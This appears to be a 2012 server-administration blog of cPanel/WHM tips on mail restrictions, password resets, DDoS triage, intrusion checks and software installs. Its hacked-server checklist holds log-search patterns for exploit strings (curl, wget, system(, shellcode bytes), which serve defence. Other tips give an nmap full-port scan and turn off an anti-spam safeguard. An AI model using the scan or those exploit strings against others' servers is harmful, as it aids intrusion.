Tuesday, 31 January 2012

Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings


The  mail sent by nobody is usually restricted in most of the server in order to prevent spamming activity.

In most of the CMS, the mail functions will be handled by the PHP scripts which has the ownership of nobody.

You can see the following snippet present in the exim main log if that particular restriction is enabled in the server.

root@x3 [/home/pgnowonl/public_html]# grep 1RsSjE-0030Z3-0w /var/log/exim_mainlog
2012-02-01 13:27:32 1RsSjE-0030Z3-0w <= nobody@abc.com U=nobody P=local S=1745
2012-02-01 13:27:32 1RsSjE-0030Z3-0w ** hemanth.presence@gmail.com R=checkspam2: Mail sent by user nobody being discarded due to sender restrictions in WHM->Tweak Settings
2012-02-01 13:27:32 1RsSjE-0030Z5-1n <= <> R=1RsSjE-0030Z3-0w U=mailnull P=local S=2620
2012-02-01 13:27:32 1RsSjE-0030Z3-0w Completed



You can disable it by accessing your WHM.

WHM >> Tweak Settings

click on off in the option 'prevent nobody to send mail'.


Prevent “nobody” from sending mail [?]
Prevent the user “nobody” from sending out mail to remote addresses
(PHP and CGI scripts generally run as “nobody” if you are using mod_php or have Suexec disabled.)



Save this settings and there won't be any problem in sending mails from 'nobody'.

That's the Fix. :) :)







Monday, 30 January 2012

Reset WordPress admin password

Reset WordPress admin password using database:

 1. Find the database name in "wp-config.php" for the corresponding WP domain.

2. cd /var/lib/mysql

3. Take backup
   mysqldump databasename > databasename.sql

4. Enter into MySQL prompt.
   mysql

root@hostname# mysql
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 2859662
Server version: 5.1.56-log MySQL Community Server (GPL)

mysql>

mysql> use databasename;

mysql> show tables;

5.check for 'wp_users' table.

mysql> select * from wp_users; (To check username)

mysql> update wp_users set user_pass=MD5('GIVE_STRONG_ADMIN_PASSWORD_HERE') where  user_login="admin";

mysql> quit.

Now, try to access WordPress using new password.
 

Find custom SSH port number

 Art of Port Scanning  -- namp

We can find custom SSH port number using  nmap:

command:

 nmap -P0 -T4 -sV -p- "IP address"

           -PO[protocol list]:  IP Protocol Ping
           -T<0-5>: Set timing template (higher is faster). By default it will be in milliseconds.
           -sV: Probe open ports to determine service/version info
           -p <port ranges>: Only scan specified ports





Simple difference b/w Sub domain, Parked, and Add-On domain.

Simple difference b/w Sub domain, Parked, and Add-On domain.

Sub domain
* Lets say your domain is mysite.com.
* You install a Message Board and put in in a directory called mysite.com/board/.
* You can turn the directory board into a sub-domain by adding it as a sub-domain from your Control Panel.
* Now you can access your Message board as either mysite.com/board OR board.mysite.com
* This costs you nothing and is free.

Parked Domain
* You have two domains mysite.com and my-other-site.com.
* mysite.com is the domain of your website and you want to add my-other-site.com.
* You want them both to go to the same place. In other words, when someone types either www.mysite.com or www.my-other-site.com they will go to the same page(s) on your website.
* In order to have additional parked domains you need to purchase them from a registry.
* Register Parked domains here (open a new account if you don't have one registered)

Add-On Domains
* You have two domains mysite.com and my-other-site.com.
* You want the two domains to be totally separate/independent websites.
* In order to have additional add-on domains you need to purchase them from a registry.
* Register Add-on domains here (open a new account if you don't have one registered)

Sunday, 29 January 2012

Modules install with Apache to avoid DDOS attacks.


Modules install with Apache to avoid DDOS attacks:

To mitigate DDoS attacks, you can install :

Mod_security
Mod_dosevasive
Mod_limitipconn
DoS-Deflate

***************
1) "Mod_security" : "Mod_security" is a module which helps us to protect our server from exploits that are passed though apache. Mod_security does this by inspecting the information send in apache and filtering out all of the "bad" requests as determined by the set of rules specified in the Apache configuration file.

2) "Mod_dosevasive" : "Mod_dosevasive" helps to prevent the overloading of a web server from a quest based attack, script attacks, brute force attacks, or even some malicious CGI scripts. Once it detects a problem it will add the offending IP to APF, which must be installed.

http://www.theserverpages.com/articles/servers/linux/apache/mod_dosevasive_Apache_Module_How-To.html

3) "Mod_limitipconn" : Apache module "Mod_limitipconn" allows web server administrators to limit the number of simultaneous downloads permitted from a single IP address.

4) "D)DoS-Deflate" : "(D)DoS-Deflate" script basically monitors and tracks the IP addresses which are sending and establishing large amount of TCP network connections.
***************

1. http://www.eth0.us/mod_security > mod_security

2. http://deflate.medialayer.com/ > dos_deflate

3. http://www.eth0.us/mod_evasive > mod_evasive


 You can install these modules in the server to mitigate DDoS attack




Few steps to be taken when you feel that the server is under DDOS attack:

Few steps to be taken when you feel that the server is under DDOS attack:
Step 1: Check the load using the command "w".

Step 2: Check which service is utilizing maximum CPU by "nice top".

Step 3: Check which IP address is taking maximum connection using the command:

netstat -anpl|grep :80|awk {'print $5'}|cut -d":" -f1|sort|uniq -c|sort -n


Note: 'print $5' indicates the IP address which are having connections from external.

Step 4: Check the IP address of the server having maximum connection using the command:

netstat -alpn | grep :80 | awk '{print $4}' | cut -d: -f1 |sort |uniq -c
or
## netstat -alpn | grep :80 | awk '{print $4}' |awk -F: '{print $(NF-1)}' |sort |uniq -c 


Note: 'print $4' indicates the IP address which is configured in the server.

Step 5: Then block the IP address using APF firewall "apf -d <IP address>" or using CSF firewall "csf -d <IP address

Friday, 27 January 2012

Find user Bandwidth via SSH shell (CPanel/WHM)

How to find the bandwidth utilized by individual users via SSH?


1)Create a new file with following code.
2) chmod +x bandwidth
3) Then execute the file with 2 parameters viz. month and year.



vi bandwidth

#!/bin/bash

cd /var/cpanel/bandwidth/
ls | grep -v "\." | xargs -n 1 -izzz sh -c "echo -n zzz \" = \"; egrep \"^$1\..*\.$2-all\" zzz | awk -F'=' 'START {bytes=0} { bytes+=\$2 } END {print bytes/1024/1024 \" MB\"}'"
cd -

Usage:

./bandwidth month year

Eg To see top 10 BW taking users in January 2012

./bandwidth 1 2012 | sort -nrk 3 | head -10

The above will show the result in the descending order. It will display the  highest BandWidth usage account first.

User names can be related with domain names from /etc/trueuserdomains 

Monday, 23 January 2012

Check if the server is hacked or not


How to check if the server is hacked or not?

These are the simple steps to check if your server got hacked or free from hack.

security - Check your server is hacked or not
Steps to investigate hacked linux server

Steps to investigate hacked linux server


Check your server is hacked or not

Following are the few to investigate whether the linux server is hacked or not:

Follow the steps one by one and analyse or check your linux server is hacked or not.


Who is on the Server:
$ w

$ netstat -nalp | grep ":22"

OR


$ w && netstat -nalp | grep ":22"
The above commands will say who are all logged into the server.



Who was on the Server
$ last


$ cat /var/log/secure* | grep ssh | grep Accept


$ cat /var/log/secure* | grep ftp | grep Accept



Check what is the Current Network Activity of your server
$ netstat -nalp


$ nmap localhost

OR


$ netstat -nalp && nmap localhost


What Processes are Running:
$ ps -elf


$ ls /proc/*/exe -la


What Files are in the Common Attack Points:
$ ls /tmp -la


$ ls /var/tmp -la


$ ls /dev/shm -la
These are all the common unsecured places where the hacker intrudes into your linux server.

Don't delete any thing or make changes just yet, just catalog every thing. Do not access a file with cat or strings, catalog the files and save that for later. Once you start deleting things you can no longer further investigate as to how deep they have penetrated. Don't be fooled into seeing a common Apache compromise and think it ended there. Many times that was just the broken window they used to get in the first time, meanwhile they are tunneling deeper trying to get into root access.



What version of Linux is running
$ cat /etc/redhat-release


For non Red-Hat Linux
$ cat /etc/issue


Compare this to the kernel
$ uname -a

and


$ cat /proc/version


Who is the author of the file:
$ ls -la --author


When was the last time the file has been accessed and by who:
$ ls -l --time=access

Before you run off and use the cat command it is good to first check the file type with the file command. Many a time I myself have been fooled seeing a file marked as something.html and finding it was really a binary file.



What kind of file is it(ASCII or Binary):
$ file filename

OR


$ file /path/to/directory/*

You have been trying to be sneaky and not have any obvious virus scan running in the process list so as to not be detected, but that is tedious work and slow.



Update the Locate Database:
$ updatedb &

If this is a web server then the next thing to hunt for is signs of Apache exploits and SQL injection scripts. This nice little script was handed down to me from a co-worker and does a nice job of hunting through the log files rather than the long tedious work of searching manually.



Search for Apache Exploit
$ for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done

OR


$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*


cPanel
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/*/statistics/logs/*


Ensim
egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20'/home/virtual/site*/fst/var/log/httpd/*


Plesk
$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /home/httpd/vhosts/*/statistics/logs/*

$ egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /var/log/httpd/*


Search for Shell Code:
$ cat /path/to/access/logs/* | grep "/x90/"

From these steps you can confirm that the server is hacked or protected. I hope these steps will help you a lot in trouble shooting the issues. Please give us your valuable comments if you like this post or if you have any quires.



Install Zend module via RPM

How to install Zend module via RPM?

These are the steps to install zend module via RPM.

1) Download
rpm -Uvh http://download.fedora.redhat.com/pub/epel/5/i386/epel-release-5-4.noarch.rpm
or
rpm -Uvh http://rpms.famillecollet.com/enterprise/remi-release-5.rpm
2)Install Zend Framework 1.11.3
yum --enablerepo=remi install php-ZendFramework
3)Install Zend Framework Full setup
yum --enablerepo=remi install php-ZendFramework* --exclude php-ZendFramework-Db-Adapter-Oracle
4)Custom setup
yum --enablerepo=remi install php-ZendFramework \
php-ZendFramework-Cache-Backend-Memcached php-ZendFramework-Db-Adapter-Mysqli \
php-ZendFramework-Dojo php-ZendFramework-Feed \ php-ZendFramework-Gdata \
php-ZendFramework-Pdf php-ZendFramework-Search-Lucene \
php-ZendFramework-Services php-ZendFramework-Soap php-ZendFramework-demos \
php-ZendFramework-extras php-ZendFramework-tests
5) Create New Zend test-project and Test That The Zend Framework is Working.
Create New Zend test-project and Test That The Zend Framework is Working
zf show version
Zend Framework Version: 1.11.3
6)Create new zend project
## Change to web directory ##
cd /var/www/html

## Create new Zend Framework project using zf command ##
zf create project test-project
Creating project at /var/www/html/test-project
Note: This command created a web project, for more information setting up your VHOST, please see docs/README
7)Create Link (symlink) / Copy Zend directory to your project directory
## Change directory to /var/www/html/test-project/library ##
cd test-project/library
## OR ##
cd /var/www/html/test-project/library

## Symlink Zend Framework on library path ##
ln -s /usr/share/php/Zend .

## OR ##

## Copy Zend Framework on library path ##
cp -R /usr/share/php/Zend .
8)Check test-project directory content
Should look like following (check also library/Zend):


test-project
|-- application
| |-- Bootstrap.php
| |-- configs
| | `-- application.ini
| |-- controllers
| | |-- ErrorController.php
| | `-- IndexController.php
| |-- models
| `-- views
| |-- helpers
| `-- scripts
| |-- error
| | `-- error.phtml
| `-- index
| `-- index.phtml
|-- docs
| `-- README.txt
|-- library
| `-- Zend -> /usr/share/php/Zend
|-- public
| `-- index.php
`-- tests
|-- application
| `-- bootstrap.php
|-- library
| `-- bootstrap.php
`-- phpunit.xml

16 directories, 11 files

9)Check index page on browser
Open following url http://localhost/test-project/public/ on your browser.


Saturday, 21 January 2012

cPHulk bruteforce attack + remove IP address from database

How to remove the IP address from cPHulk bruteforce attack via cPanel database?

---------
This account is currently locked out because a brute force attempt was detected. Please wait 10 minutes and try again. Attempting to login again will only increase this delay. If you frequently experience this problem, we recommend having your username changed to something less generic.
----------
or
----------
You cannot login to the account - Brute Fore protection
----------

Normal method we can just whitelist the IP address from the cPHulk option available in the WHM. But still the IP address is available in the database.

How can we remove the IP address from the database?

First find your IP address of your local machine.

http://www.whatismyip.com

if you can ssh to the server login as root and execute the following in the server.

Code:
# mysql
prompt should change to mysql

Code:
mysql> use cphulkd;
you will see...database changed

Code:
mysql>BACKUP TABLE `brutes` TO '/path/to/backup/directory';
backup first!

Code:
mysql> SELECT * FROM `brutes` WHERE `IP`='xxx.xxx.xxx.xxx';
insert your IP instead xxx.xxx.xxx.xxx. Is your IP there? If so,

Code:
mysql> DELETE FROM `brutes` WHERE `IP`='xxx.xxx.xxx.xxx';
that should remove your IP from the table and you will see that in mysql reply. Finally


Code:
mysql>quit
should return you to your usual prompt.


Now you can proceed logging into the cPanel without any issue.


This below command will flush full database. i.e all the blocked IP will be flushed.
mysql> delete from brutes;
Query OK, 0 rows affected (0.00 sec)

mysql> delete from logins;
Query OK, 32 rows affected (0.00 sec)

cpanel spamers

How to detect spammers in exim server cPanel??

In cPanel server exim stats is one of the useful command to find all the information you need were many do not use the command to detect the spammers. Here is the command to detect the spammers via exim stat. You can simply check the exim stat and detect the possible spammers in the cPanel servers.

Execute the following command.
/usr/sbin/eximstats -t10 /var/log/exim_mainlog > /root/stats.txt


t10 = top 10 counts of the following


The above command gives the following details:

- top 10 local destinations by volume
- top 10 local destinations by message count
- top 10 sending hosts by volume
- top 10 sending hosts by message count


Also it will give the output of top 10 email id or user sending the spam mails. Current email stats of exim and many

Now all the out put will be stored in the text file in /root/stats.txt. You can just "cat" that text file or you can simply use less to vi the details. Using the details appended in the text file you can find the spammers.

How to disable Joomla plugin ?


To turn off cache, you need to do two things:

Global Configuration--> System-->Cache Settings-->Cache
Please select 'No';

Extensions-->Plugin Manager-->System - Cache
Please disable the plugin-"System-Cache" .

Windows server 2003 Admin password change


To change the Administrator password in Windows Server 2003, please follow the steps given below.

===
1. Log on to the computer using the Administrator account.

2. Click Start, right-click Administrative Tools, and then click Open. Administrative Tools opens.

3. Double-click Computer Management, click Local Users and Groups, and in the details pane, double-click Users. The Users folder opens.

4. In the details pane, right-click the account that you want to change, and click Set Password. A warning dialog box opens. Read the information to determine whether you want to proceed with the step to change the password.

5. In New Password, type a password. In Confirm password, retype the password, and then click OK.
===

That's it :) You have done :)

Have a nice day :)

Thursday, 12 January 2012

open meeting installation on linux servers

Open meeting is a software that is used for web conferencing, online training. The following guidelines will show how to install openmeeting in your linux server.

+ First, we will have to check whether mysql is installed in the server or not. If it is installed then enable encoding mechanism for mysql. Open my.cnf(vi /etc/my.cnf)

------------------
default-character-set=utf8
character-set-server=utf8
------------------

+ Next remove the ImageMagick and sox from the server.

---------------
# rpm -e ImageMagick-6.2.8.0-4.el5_1.1
# rpm -e --nodeps sox-12.18.1-1
---------------

+ "rpmforge repo" needs to installed. Please use the following command to install "rpmforge repo".

--------------
# rpm -Uvh http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.3.6-1.el3.rf.x86_64.rpm
--------------

+ Add the following content in rc.local(vi /etc/rc.local). So, after the reboot openoffice will automatically start.
and add the following lines under mysqld section. Don't forgot to restart the mysql service after the change :)
------------

/usr/lib/openoffice.org3/program/soffice "-accept=socket,host=localhost,port=8100;urp;StarOffice.ServiceManager" -nologo -headless -nofirststartwizard &

------------

+ Install the required modules.

-------------
# yum install freetype freetype-devel fontconfig fontconfig-devel java-1.6.0-openjdk-devel libtiff libtiff-devel libjpeg-devel libjpeg giflib giflib-devel libpaper libpaper-devel xml-commons-apis libpng libpng-devel libxml2 libxml2-devel fftw3 fftw3-devel cairo cairo-devel flac flac-devel wavpack wavpack-devel libsndfile libsndfile-devel libmad libmad-devel yasm-devel yasm gcc gcc-c++
-------------

+ The next step is to install required OpenOffice products.

-------------
# yum groupinstall 'Office/Productivity'# yum install openoffice.org-headless
-------------

+ Now, we will need to install the required the modules.


1. Ghostscript:

-----------
# cd /usr/src
# wget http://ghostscript.com/releases/ghostscript-8.71.tar.gz
# tar zxvf ghostscript-8.71.tar.gz
# cd ghostscript-8.71
# ./configure --prefix=/usr
# mkdir obj
# mkdir bin
# make all
# make install
-----------

2. Lame:

-----------
# cd /usr/src
# wget http://downloads.sourceforge.net/project/lame/lame/3.98.4/lame-3.98.4.tar.gz
# tar zxvf lame-3.98.4.tar.gz
# cd lame-3.98.4
# ./configure --prefix=/usr
# make all
# make install
-----------

3. SWFTools:

-----------
# cd /usr/src
# wget http://www.swftools.org/swftools-0.9.1.tar.gz
# tar zxvf swftools-0.9.1.tar.gz
# cd swftools-0.9.1
# ./configure --prefix=/usr
# make all
make install
-----------

4. ImageMagick:

-----------
# cd /usr/src
# wget ftp://ftp.imagemagick.org/pub/ImageMagick/ImageMagick-6.6.4-10.tar.gz
# tar zxvf ImageMagick-6.6.4-10.tar.gz
# cd ImageMagick-6.6.4-10
# ./configure --prefix=/usr
# make all
# make install
-----------

5. SoX:

-------------
# cd /usr/src
# wget http://sourceforge.net/projects/sox/files/sox/14.3.1/sox-14.3.1.tar.gz/download?use_mirror=spacetar zxvf sox-14.3.1.tar.gz
# cd sox-14.3.1
# ./configure --prefix=/usr
# make all
# make install
-------------

6. Install SVN:

----------
# yum install subversion
----------

7: Install FFMPFG:

-----------
# cd /usr/src
# svn checkout svn://svn.ffmpeg.org/ffmpeg/trunk ffmpeg
# cd ffmpeg
# ./configure --enable-libmp3lame --enable-postproc --enable-gpl --enable-pthreads --enable-avfilter --prefix=/usr
# make all
# make install
-----------

8 .Install Java:

----------
# yum -y install java-1.6.0-openjdk java-1.6.0-openjdk-devel
----------

+ Now, the final step is to install openmeeting in the server.

------------
# wget http://openmeetings.googlecode.com/files/openmeetings_1_9_1_r4707.zip
# unzip openmeetings_1_8_8_r4555.zip -d om
# cd om/red5/
# chmod 755 red5.sh
# ./red5.sh
------------

You have completed the installation of openmeeting.
Open the browser and enter the openmeeting URL:

----------
http://IPADDRESS:5080/openmeetings/install
----------

You will need to fillup admin username, password, etc., Once, you enter these click on install. It will take some time for complete installation.

Now, you can access the openmeeting by using the following URL:

---------
http://IPADDRESS:5080
---------

Courtesy: Vishnuraj(Co worker).

Thursday, 5 January 2012

Whitelist a domain in ASSP spam filter

How to whitelist a domain in the ASSP spam filter? Also, how to whitelist a email account in the assp spam filter

My cPanel server is running with ASSP spam filter. A domain is blacklisted in the ASSP spam filter. How to whitelist it? Also if I want to whitelist a single email account of that domain how to I go about it?


Solution:

The solution is simple. You could have installed the ASSP spam filter in the default path like "/usr/local/assp".

Whitelisting a domain or whitelisting the email account are similar process.

1) Just vi the whitedomains.txt

i.e vi /usr/local/assp/files/whitedomains.txt

2) Add the domain name or email account to be whitelisted.

e.g :-

domain.com
hemanth@domain.com
admin@google.com

save and quit.

3) Rebuild the ASSP spam database

 Login to the cPanel and go to Grscripts ASSP Deluxe 


You can find the option "Rebuild SPAMdb". Click it.

That's it


or


Another method of whitelisting:


4.1) You have to login to the ASSP web inter face available in the cPanel.


4.2) Then go to Whitelisting domains option 


4.3) Add the domain names or email ID in the option "whitelist or Address"


4.4) Scroll down and click "Apply Changes"


4.5) logout of the ASSP web interface


4.6) Rebuild spamdb in the assp